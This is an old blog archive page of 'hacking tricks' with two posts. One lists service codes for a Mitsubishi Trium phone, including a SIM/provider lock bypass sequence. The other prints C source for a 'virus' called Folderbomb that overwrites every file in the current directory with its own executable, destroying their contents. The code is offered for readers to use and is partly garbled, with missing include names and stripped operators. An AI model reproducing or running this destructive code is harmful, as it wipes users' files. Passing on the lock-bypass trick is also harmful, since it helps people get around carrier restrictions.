Showing posts with label CheatCodes. Show all posts
Showing posts with label CheatCodes. Show all posts

Tuesday, 14 December 2010

Mobile Cheat Secret Code sFor Mitsubushi Trium Phone

*#0000# to reset the phones menu-language to natural language, set initially by the distributor.

*#06# for checking the IMEI (International Mobile Equipment Identity)

hold * then 5806 - show software version
hold * then 5807 - a littel bit diffrent
hold * then 5472 - Testmode for datacable (it seems so)

hold * then 4329 - Activate and deactivate NETMONITOR
hold * then 621342 - Activate and deactivate another NETMONITOR
hold * then 3926 - shutdown

SP lock
You can turn around the lock routin by entering **04*PIN*PIN*PIN# now
the secretcode change was applied and the software turns back to main
menue. It works not on all triums, only on thos with older sofware
versions.

Monday, 13 December 2010

Virus Code In C - Learn Latest Computer And Mobile Hacking Tricks

Virus in c
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);
cprintf("--------------------------------------------------------------------------");
printf("nVirus: Folderbomb 1.0n");
cprintf("--------------------------------------------------------------------------");
done = findfirst("*.*",&ffblk,0);
while (!done)
{
printf("n");
cprintf(" %s ", ffblk.ff_name);
printf("is attacked by ");
cprintf("Folderbomb");
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONLY);
while(1)
{
byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
elsebreak;
}
close(source);close(target);done = findnext(&ffblk);
}
getch();
}

Twitter Delicious Facebook Digg Stumbleupon Favorites More